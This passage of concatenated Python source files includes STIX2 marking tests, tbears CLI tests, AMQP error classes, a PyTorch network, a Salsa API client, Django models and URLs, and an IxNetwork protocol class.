Malware(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], MARKING_IDS[2]],
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
dict(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], MARKING_IDS[2]],
),
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], TLP_AMBER.id],
**MALWARE_KWARGS),
Malware(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], TLP_AMBER],
),
])
def test_remove_markings_multiple(data):
before = data[0]
after = data[1]
before = markings.remove_markings(before, data[2], None)
assert before['object_marking_refs'] == after['object_marking_refs']
def test_remove_markings_bad_markings():
before = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS
)
with pytest.raises(AssertionError) as excinfo:
markings.remove_markings(before, [MARKING_IDS[4]], None)
assert str(excinfo.value) == "Marking ['%s'] was not found in Malware!" % MARKING_IDS[4]
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_clear_markings(data):
before = data[0]
after = data[1]
before = markings.clear_markings(before, None)
assert 'object_marking_refs' not in before
assert 'object_marking_refs' not in after
def test_is_marked_object_and_granular_combinations():
"""Test multiple combinations for inherited and descendant markings."""
test_sdo = \
{
"a": 333,
"b": "value",
"c": [
17,
"list value",
{
"g": "nested",
"h": 45
}
],
"x": {
"y": [
"hello",
88
],
"z": {
"foo1": "bar",
"foo2": 65
}
},
"object_marking_refs": "11",
"granular_markings": [
{
"marking_ref": "1",
"selectors": ["a"]
},
{
"marking_ref": "2",
"selectors": ["c"]
},
{
"marking_ref": "3",
"selectors": ["c.[1]"]
},
{
"marking_ref": "4",
"selectors": ["c.[2]"]
},
{
"marking_ref": "5",
"selectors": ["c.[2].g"]
},
{
"marking_ref": "6",
"selectors": ["x"]
},
{
"marking_ref": "7",
"selectors": ["x.y"]
},
{
"marking_ref": "8",
"selectors": ["x.y.[1]"]
},
{
"marking_ref": "9",
"selectors": ["x.z"]
},
{
"marking_ref": "10",
"selectors": ["x.z.foo2"]
},
]
}
assert markings.is_marked(test_sdo, ["1"], "a", False, False)
assert markings.is_marked(test_sdo, ["1", "11"], "a", True, False)
assert markings.is_marked(test_sdo, ["1", "11"], "a", True, True)
assert markings.is_marked(test_sdo, ["1"], "a", False, True)
assert markings.is_marked(test_sdo, "b", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["11"], "b", True, False)
assert markings.is_marked(test_sdo, ["11"], "b", True, True)
assert markings.is_marked(test_sdo, "b", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["2"], "c", False, False)
assert markings.is_marked(test_sdo, ["2", "11"], "c", True, False)
assert markings.is_marked(test_sdo, ["2", "3", "4", "5", "11"], "c", True, True)
assert markings.is_marked(test_sdo, ["2", "3", "4", "5"], "c", False, True)
assert markings.is_marked(test_sdo, "c.[0]", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["2", "11"], "c.[0]", True, False)
assert markings.is_marked(test_sdo, ["2", "11"], "c.[0]", True, True)
assert markings.is_marked(test_sdo, "c.[0]", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["3"], "c.[1]", False, False)
assert markings.is_marked(test_sdo, ["2", "3", "11"], "c.[1]", True, False)
assert markings.is_marked(test_sdo, ["2", "3", "11"], "c.[1]", True, True)
assert markings.is_marked(test_sdo, ["3"], "c.[1]", False, True)
assert markings.is_marked(test_sdo, ["4"], "c.[2]", False, False)
assert markings.is_marked(test_sdo, ["2", "4", "11"], "c.[2]", True, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2]", True, True)
assert markings.is_marked(test_sdo, ["4", "5"], "c.[2]", False, True)
assert markings.is_marked(test_sdo, ["5"], "c.[2].g", False, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2].g", True, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2].g", True, True)
assert markings.is_marked(test_sdo, ["5"], "c.[2].g", False, True)
assert markings.is_marked(test_sdo, ["6"], "x", False, False)
assert markings.is_marked(test_sdo, ["6", "11"], "x", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "9", "10", "11"], "x", True, True)
assert markings.is_marked(test_sdo, ["6", "7", "8", "9", "10"], "x", False, True)
assert markings.is_marked(test_sdo, ["7"], "x.y", False, False)
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y", True, True)
assert markings.is_marked(test_sdo, ["7", "8"], "x.y", False, True)
assert markings.is_marked(test_sdo, "x.y.[0]", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y.[0]", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y.[0]", True, True)
assert markings.is_marked(test_sdo, "x.y.[0]", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["8"], "x.y.[1]", False, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y.[1]", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y.[1]", True, True)
assert markings.is_marked(test_sdo, ["8"], "x.y.[1]", False, True)
assert markings.is_marked(test_sdo, ["9"], "x.z", False, False)
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z", True, True)
assert markings.is_marked(test_sdo, ["9", "10"], "x.z", False, True)
assert markings.is_marked(test_sdo, "x.z.foo1", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z.foo1", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z.foo1", True, True)
assert markings.is_marked(test_sdo, "x.z.foo1", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["10"], "x.z.foo2", False, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z.foo2", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z.foo2", True, True)
assert markings.is_marked(test_sdo, ["10"], "x.z.foo2", False, True)
assert markings.is_marked(test_sdo, ["11"], None, True, True)
assert markings.is_marked(test_sdo, ["2"], None, True, True) is False
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_is_marked_no_markings(data):
marked = data[0]
nonmarked = data[1]
assert markings.is_marked(marked)
assert markings.is_marked(nonmarked) is False
def test_set_marking():
before = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[4], MARKING_IDS[5]],
**MALWARE_KWARGS
)
before = markings.set_markings(before, [MARKING_IDS[4], MARKING_IDS[5]], None)
for m in before["object_marking_refs"]:
assert m in [MARKING_IDS[4], MARKING_IDS[5]]
    for m in [MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]]:
        assert m not in before["object_marking_refs"]
for x in before["object_marking_refs"]:
assert x in after["object_marking_refs"]
@pytest.mark.parametrize("data", [
([]),
([""]),
(""),
([MARKING_IDS[4], 687])
])
def test_set_marking_bad_input(data):
before = Malware(
object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS
)
with pytest.raises(exceptions.InvalidValueError):
before = markings.set_markings(before, data, None)
assert before == after
| python |
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import shutil
from tbears.command.command_score import CommandScore, check_project
from tbears.tbears_exception import TBearsCommandException
from tests.test_parsing_command import TestCommand
from tests.test_util import TEST_UTIL_DIRECTORY
class TestCommandScore(TestCommand):
def setUp(self):
super().setUp()
self.tear_down_params = ['proj_unittest']
self.project = 'proj_unittest'
self.project_class = 'ProjUnittest'
self.uri = 'http://127.0.0.1:9000/api/v3'
self.mode = "install"
self.arg_from = "hxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
self.to = "cx0000000000000000000000000000000000000000"
self.keystore = os.path.join(TEST_UTIL_DIRECTORY, 'test_keystore')
self.config_path = os.path.join(TEST_UTIL_DIRECTORY, 'test_tbears_cli_config.json')
# Test if cli arguments are parsed correctly.
def test_deploy_args_parsing(self):
# Parsing test
os.mkdir(self.project)
cmd = f"deploy {self.project} -u {self.uri} -m {self.mode} -f {self.arg_from} " \
f"-o {self.to} -k {self.keystore} -c {self.config_path} "
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(parsed.command, 'deploy')
self.assertEqual(parsed.project, self.project)
self.assertEqual(parsed.uri, self.uri)
self.assertEqual(parsed.mode, self.mode)
self.assertEqual(parsed.to, self.to)
self.assertEqual(parsed.keyStore, self.keystore)
self.assertEqual(parsed.config, self.config_path)
shutil.rmtree(self.project)
# No project directory or project zip file
cmd = f'deploy {self.project}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
os.mkdir(self.project)
# Invalid from address
invalid_addr = 'hx1'
cmd = f'deploy {self.project} -f {invalid_addr}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Too many arguments
cmd = f'deploy arg1 arg2'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Insufficient argument
cmd = f'deploy'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Wrong option
cmd = f'deploy {self.project} -w wrongoption'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Not supported mode (only install, update are available)
cmd = f'deploy {self.project} -m not_supported_mode'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Invalid to address
invalid_addr = 'hx1'
cmd = f'deploy {self.project} -o {invalid_addr}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Keystore file does not exist
cmd = f'deploy {self.project} -k ./keystore_not_exist'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# config file does not exist
cmd = f'deploy {self.project} -c ./config_not_exist'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
shutil.rmtree(self.project)
    # Deploy method (deploy, _check_deploy) test. Before deploying a SCORE,
    # check whether the arguments satisfy the requirements.
    # Bug: when this method is tested in a terminal no error is found, but running it via PyCharm's test runner raises an error.
def test_check_deploy_necessary_args(self):
# # Deploy essential check
# No project directory
cmd = f'deploy {self.project}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Keystore file does not exist
no_keystore = './keystore_not_exist'
cmd = f'deploy {self.project} -k {no_keystore}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
conf = self.cmd.cmdUtil.get_init_args(project=self.project, score_class=self.project_class)
self.cmd.cmdUtil.init(conf)
# Invalid password value
# Even though input invalid password, _check_deploy method should return password
# (this method doesn't check password value)
cmd = f'deploy {self.project} -k {self.keystore}'
user_input_password = "1234"
expected_password = "1234"
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(CommandScore._check_deploy(vars(parsed), user_input_password), expected_password)
# Insufficient argument
cmd = f'deploy {self.project} -m update'
parsed = self.parser.parse_args(cmd.split())
self.assertRaises(TBearsCommandException, CommandScore._check_deploy, vars(parsed))
shutil.rmtree(self.project)
def test_check_deploy_project(self):
conf = self.cmd.cmdUtil.get_init_args(project=self.project, score_class=self.project_class)
self.cmd.cmdUtil.init(conf)
project = f"{self.project}"
# there is no __init__.py
os.rename(f"{project}/__init__.py", "__init__.py.bak")
self.assertRaises(TBearsCommandException, check_project, project)
os.rename("__init__.py.bak", f"{project}/__init__.py")
# there is no package.json
os.rename(f"{project}/package.json", "package.json.bak")
self.assertRaises(TBearsCommandException, check_project, project)
# wrong package.json file
self.touch(f"{project}/package.json")
self.assertRaises(TBearsCommandException, check_project, project)
os.rename("package.json.bak", f"{project}/package.json")
# there is no main_module file
os.rename(f"{project}/{project}.py", f"{project}.py.bak")
self.assertRaises(TBearsCommandException, check_project, project)
# working good
os.rename(f"{project}.py.bak", f"{project}/{project}.py")
self.assertEqual(check_project(project), 0)
# do not allow '/' in main_module field
os.mkdir(f"{project}/modify")
os.rename(f"{project}/{project}.py", f"{project}/modify/{project}.py")
with open(f"{project}/package.json", mode='r+') as file:
package: dict = json.load(file)
package['main_module'] = f"modify/{project}"
file.seek(0)
file.truncate()
json.dump(package, file)
self.assertRaises(TBearsCommandException, check_project, project)
# allow '.' in main_module field
with open(f"{project}/package.json", mode='r+') as file:
package: dict = json.load(file)
package['main_module'] = f"modify.{project}"
file.seek(0)
file.truncate()
json.dump(package, file)
self.assertEqual(check_project(project), 0)
def test_clear_args_parsing(self):
# Parsing test
cmd = f'clear'
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(parsed.command, 'clear')
# Too many arguments
cmd = f'clear arg1 arg2'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
| python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
ManagementError exception class and subclasses, with status codes used by AMQP.
"""
from httplib import responses as STATUS_TEXT
from httplib import OK, NO_CONTENT, CREATED, \
BAD_REQUEST, UNAUTHORIZED, FORBIDDEN, NOT_FOUND, INTERNAL_SERVER_ERROR, NOT_IMPLEMENTED
class ManagementError(Exception):
"""
An AMQP management error.
str() gives a string with status code and text.
@ivar status: integer status code.
@ivar description: detailed description of error.
"""
def __init__(self, status, description):
self.status, self.description = status, description
super(ManagementError, self).__init__(description)
@staticmethod
def create(status, description):
"""Create the appropriate ManagementError subclass for status"""
try:
class_name = STATUS_TEXT[status].replace(' ', '') + "Status"
return globals()[class_name](description)
except KeyError:
return ManagementError(status, description)
def _error_class(status):
"""Create a ManagementError class for a particular status"""
class Error(ManagementError):
def __init__(self, description): ManagementError.__init__(self, status, description)
return Error
class BadRequestStatus(_error_class(BAD_REQUEST)): pass
class UnauthorizedStatus(_error_class(UNAUTHORIZED)): pass
class ForbiddenStatus(_error_class(FORBIDDEN)): pass
class NotFoundStatus(_error_class(NOT_FOUND)): pass
class InternalServerErrorStatus(_error_class(INTERNAL_SERVER_ERROR)): pass
class NotImplementedStatus(_error_class(NOT_IMPLEMENTED)): pass
__all__ = [
u"STATUS_TEXT", u"OK", u"NO_CONTENT", u"CREATED",
u"BAD_REQUEST", u"UNAUTHORIZED", u"FORBIDDEN", u"NOT_FOUND",
u"INTERNAL_SERVER_ERROR", u"NOT_IMPLEMENTED",
u"ManagementError",
u"BadRequestStatus", u"UnauthorizedStatus", u"ForbiddenStatus",
u"NotFoundStatus", u"InternalServerErrorStatus", u"NotImplementedStatus"]
| python |
class Grill:
"""
This is grill.
"""
| python |
import torch
from torch import nn
from copy import deepcopy
from utils import visualize_batch
class LLL_Net(nn.Module):
""" Basic class for implementing networks """
def __init__(self, model, remove_existing_head=False):
head_var = model.head_var
assert type(head_var) == str
assert not remove_existing_head or hasattr(model, head_var), \
"Given model does not have a variable called {}".format(head_var)
assert not remove_existing_head or type(getattr(model, head_var)) in [nn.Sequential, nn.Linear], \
"Given model's head {} does is not an instance of nn.Sequential or nn.Linear".format(head_var)
super(LLL_Net, self).__init__()
self.model = model
last_layer = getattr(self.model, head_var)
if remove_existing_head:
if type(last_layer) == nn.Sequential:
self.out_size = last_layer[-1].in_features
# strips off last linear layer of classifier
del last_layer[-1]
elif type(last_layer) == nn.Linear:
self.out_size = last_layer.in_features
# converts last layer into identity
# setattr(self.model, head_var, nn.Identity())
# WARNING: this is for when pytorch version is <1.2
                setattr(self.model, head_var, nn.Sequential())
else:
self.out_size = last_layer.out_features
self.heads = nn.ModuleList()
self.task_cls = []
self.task_offset = []
self._initialize_weights()
def add_head(self, head_architecture):
self.heads.append(head_architecture)
# we re-compute instead of append in case an approach makes changes to the heads
self.task_cls = torch.tensor([head.out_features for head in self.heads])
self.task_offset = torch.cat([torch.LongTensor(1).zero_(), self.task_cls.cumsum(0)[:-1]])
# Simplification to work on multi-head only -- returns all head outputs in a list
def forward(self, x, return_features=True):
#gx = self.model.glayer(x)
#visualize_batch(gx.cpu(),"debug")
        x = self.model(x)  # NOTE: for birds/flowers the backbone output is 512x7x7, but for CIFAR it is 512; did we see this bug before?
        if isinstance(x, tuple):  # disentanglement (before "x" and after "xx" flatten operation)
            xx = x[1].clone()
            x = x[0]
assert (len(self.heads) > 0), "Cannot access any head"
y = []
for head in self.heads:
y.append(head(x))
if return_features and 'xx' in locals():
return y, xx
elif return_features and not 'xx' in locals():
return y, x
else:
return y
def get_copy(self):
return deepcopy(self.state_dict())
def set_state_dict(self, state_dict):
self.load_state_dict(deepcopy(state_dict))
return
def freeze_all(self):
for param in self.parameters():
param.requires_grad = False
return
def _initialize_weights(self):
# TODO: add the different initializations
pass
| python |
import json
from django.conf import settings
import requests
class SalsaException(Exception):
pass
class SalsaAPI(object):
'''
Wrapper for supporter methods:
https://help.salsalabs.com/hc/en-us/articles/224470107-Engage-API-Supporter-Data
'''
HOSTNAME = 'https://api.salsalabs.org'
SAMPLE_PUT_RESPONSE = json.dumps({
'payload': {
'count': 1,
'supporters': [
{
'firstName': '',
'lastName': '',
'address': {'postalCode': ''},
'contacts': [{
'type': 'EMAIL',
'value': '',
'status':'OPT_IN'
}],
}
]
}
})
SAMPLE_GET_RESPONSE = json.dumps({
'payload': {
'count': 1,
'supporters': [{
'result': 'FOUND',
'contacts': [{
'type': 'EMAIL',
'value': '',
'status':'OPT_IN'
}],
}]
}
})
def _make_error_message(self, error_object):
'''
Create human-readable error message from API response.
'''
return 'Invalid field "{fieldName}": {message}. {details}.\n'.format(**error_object)
def _has_valid_email(self, supporter, email_address):
'''
Determine whether a supporter has a valid contact matching the given
email address.
'''
for contact in supporter['contacts']:
email_valid = (contact['type'] == 'EMAIL' and
contact['value'] == email_address and
contact['status'] != 'HARD_BOUNCE')
if email_valid:
return True
return False
def put_supporter(self, user):
'''
Add or update supporter.
'''
endpoint = '{}/api/integration/ext/v1/supporters'.format(self.HOSTNAME)
payload = {
'supporters': [
{
'firstName': user.first_name,
'lastName': user.last_name,
'address': {'postalCode': user.userzipcode_set.get().zip_code},
'contacts': [{
'type': 'EMAIL',
'value': user.email,
'status':'OPT_IN'
}],
}
]
}
response = requests.put(
endpoint,
json={'payload': payload},
headers={'authToken': settings.SALSA_AUTH_API_KEY}
)
response_data = json.loads(response.text)
if response.status_code == 200:
supporter, = response_data['payload']['supporters']
if supporter['result'] in ('ADDED', 'UPDATED'):
return supporter
elif supporter['result'] == 'VALIDATION_ERROR':
error = ''
for e in supporter['contacts'][0].get('errors', []) + supporter['address'].get('errors', []):
                    error += self._make_error_message(e)
raise SalsaException(error)
else:
raise SalsaException('Supporter could not be added due to {}'.format(supporter['result']))
else:
raise SalsaException(response.text)
def get_supporter(self, email_address, allow_invalid=False):
'''
Return the first supporter with a matching email address that is valid,
i.e., does not have a status of 'HARD_BOUNCE'.
'''
endpoint = '{}/api/integration/ext/v1/supporters/search'.format(self.HOSTNAME)
payload = {
'identifiers': [email_address],
'identifierType': 'EMAIL_ADDRESS'
}
response = requests.post(endpoint,
json={'payload': payload},
headers={'authToken': settings.SALSA_AUTH_API_KEY})
if response.status_code == 200:
response_data = json.loads(response.text)
if response_data['payload']['count'] == 1:
supporter, = response_data['payload']['supporters']
if supporter['result'] == 'FOUND':
if allow_invalid:
return supporter
elif self._has_valid_email(supporter, email_address):
return supporter
else:
for supporter in response_data['payload']['supporters']:
if allow_invalid:
return supporter
elif self._has_valid_email(supporter, email_address):
return supporter
else:
raise SalsaException(response.text)
client = SalsaAPI()
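# Hedged usage sketch (requires settings.SALSA_AUTH_API_KEY to be configured
# and performs real HTTP requests against the Engage API; the email address is
# illustrative only):
#
#   supporter = client.get_supporter('[email protected]')
#   if supporter:
#       ...  # supporter['contacts'] holds the matched contact records
#
#   client.put_supporter(user)   # `user` is a Django User with a related zip code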
| python |
from typing import Literal
from beartype._decor.main import beartype
from pglet.control import Control
POSITION = Literal[None, "left", "top", "right", "bottom"]
class Spinner(Control):
def __init__(
self,
label=None,
id=None,
label_position: POSITION = None,
size=None,
width=None,
height=None,
padding=None,
margin=None,
visible=None,
disabled=None,
):
Control.__init__(
self,
id=id,
width=width,
height=height,
padding=padding,
margin=margin,
visible=visible,
disabled=disabled,
)
self.label = label
self.size = size
self.label_position = label_position
def _get_control_name(self):
return "spinner"
# label
@property
def label(self):
return self._get_attr("label")
@label.setter
def label(self, value):
self._set_attr("label", value)
# size
@property
def size(self):
return self._get_attr("size")
@size.setter
def size(self, value):
self._set_attr("size", value)
# label_position
@property
def label_position(self):
return self._get_attr("labelPosition")
@label_position.setter
@beartype
def label_position(self, value: POSITION):
self._set_attr("labelPosition", value)
| python |
from django.conf.global_settings import AUTH_USER_MODEL
from django.contrib.auth.models import User
from django.db import models
from django.utils import timezone
class Environment(models.Model):
name = models.CharField(max_length=150)
active = models.BooleanField(default=True)
def set_environment_into_session(self, request):
request.session['environment'] = self.name
return request
def __str__(self):
return self.name
class Employee(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
environment = models.ForeignKey(Environment, on_delete=models.CASCADE)
def __str__(self):
return '{} <- {}'.format(self.user, self.environment.name)
class Label(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=150)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Label, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Product(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=250)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Product, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Room(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=200)
products = models.ManyToManyField(Product, through='ProductPermission')
labels = models.ManyToManyField(Label, through='LabelPermission')
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Room, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Order(models.Model):
id = models.AutoField(primary_key=True)
number = models.CharField(max_length=100)
customer = models.CharField(max_length=250)
description = models.TextField(blank=True)
salesmen = models.ForeignKey(AUTH_USER_MODEL, on_delete=models.SET_NULL,
related_name='order_salesmen', null=True)
inspector = models.ForeignKey(AUTH_USER_MODEL, on_delete=models.SET_NULL,
related_name='order_inspector', null=True)
environment = models.ForeignKey(Environment, on_delete=models.SET_NULL, null=True)
rooms = models.ManyToManyField(Room, through='AllocationRoom')
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Order, self).save(*args, **kwargs)
def __str__(self):
return str(self.id)
class ProductPermission(models.Model):
id = models.AutoField(primary_key=True)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
product = models.ForeignKey(Product, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(ProductPermission, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.room.name, self.product.name))
class LabelPermission(models.Model):
id = models.AutoField(primary_key=True)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
label = models.ForeignKey(Label, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(LabelPermission, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.room.name, self.label.name))
class AllocationRoom(models.Model):
id = models.AutoField(primary_key=True)
order = models.ForeignKey(Order, on_delete=models.CASCADE)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationRoom, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.order.id, self.room.name))
def get_product_images_path(instance, filename):
return 'product_images/{}/{}/{}.{}'.format(instance.allocation_room.order.id,
instance.allocation_room.room.name,
instance.product_permission.product.name,
filename.split('.')[-1])
class AllocationProduct(models.Model):
id = models.AutoField(primary_key=True)
product_permission = models.ForeignKey(ProductPermission, on_delete=models.CASCADE)
allocation_room = models.ForeignKey(AllocationRoom, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
approved = models.BooleanField(default=False)
image = models.ImageField(blank=True, upload_to=get_product_images_path)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationProduct, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.product_permission.room.name, self.product_permission.product.name))
class AllocationLabel(models.Model):
id = models.AutoField(primary_key=True)
label_permission = models.ForeignKey(LabelPermission, on_delete=models.CASCADE)
allocation_room = models.ForeignKey(AllocationRoom, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
content = models.TextField(blank=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationLabel, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.label_permission.room.name, self.label_permission.label.name))
| python |
from django.urls import path
from .views import UserApi, CrimeMap, EntertainmentMap, EventMap, ArtMap, DirtinessMap
from rest_framework.authtoken import views
urlpatterns = [
path('user/', UserApi.as_view(), name="user-detail"),
path('login/', views.obtain_auth_token),
path('crime/', CrimeMap.as_view(), name='crime'),
path('entertainment/', EntertainmentMap.as_view(), name='entertainment'),
path('events/', EventMap.as_view(), name='events'),
path('art/', ArtMap.as_view(), name='art'),
path('dirtiness/', DirtinessMap.as_view(), name='dirtiness'),
] | python |
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PimdmStateRefresh(Base):
__slots__ = ()
_SDM_NAME = 'pimdmStateRefresh'
_SDM_ATT_MAP = {
'HeaderVersion': 'pimdmStateRefreshMessage.header.version-1',
'HeaderType': 'pimdmStateRefreshMessage.header.type-2',
'HeaderReserved': 'pimdmStateRefreshMessage.header.reserved-3',
'HeaderChecksum': 'pimdmStateRefreshMessage.header.checksum-4',
'MulticastGroupAddressAddrFamily': 'pimdmStateRefreshMessage.header.multicastGroupAddress.addrFamily-5',
'MulticastGroupAddressEncodingType': 'pimdmStateRefreshMessage.header.multicastGroupAddress.encodingType-6',
'MulticastGroupAddressB': 'pimdmStateRefreshMessage.header.multicastGroupAddress.b-7',
'MulticastGroupAddressReserved': 'pimdmStateRefreshMessage.header.multicastGroupAddress.reserved-8',
'MulticastGroupAddressZ': 'pimdmStateRefreshMessage.header.multicastGroupAddress.z-9',
'MulticastGroupAddressMaskLength': 'pimdmStateRefreshMessage.header.multicastGroupAddress.maskLength-10',
'GrpAddrFieldGroupMCastAddrIP4': 'pimdmStateRefreshMessage.header.multicastGroupAddress.grpAddrField.groupMCastAddrIP4-11',
'GrpAddrFieldGroupMCastAddrIP6': 'pimdmStateRefreshMessage.header.multicastGroupAddress.grpAddrField.groupMCastAddrIP6-12',
'SourceAddressAddrFamily': 'pimdmStateRefreshMessage.header.sourceAddress.addrFamily-13',
'SourceAddressEncodingType': 'pimdmStateRefreshMessage.header.sourceAddress.encodingType-14',
'UnicastAddrAddrIPv4': 'pimdmStateRefreshMessage.header.sourceAddress.unicastAddr.addrIPv4-15',
'UnicastAddrAddrIPv6': 'pimdmStateRefreshMessage.header.sourceAddress.unicastAddr.addrIPv6-16',
'OriginatorAddressAddrFamily': 'pimdmStateRefreshMessage.header.originatorAddress.addrFamily-17',
'OriginatorAddressEncodingType': 'pimdmStateRefreshMessage.header.originatorAddress.encodingType-18',
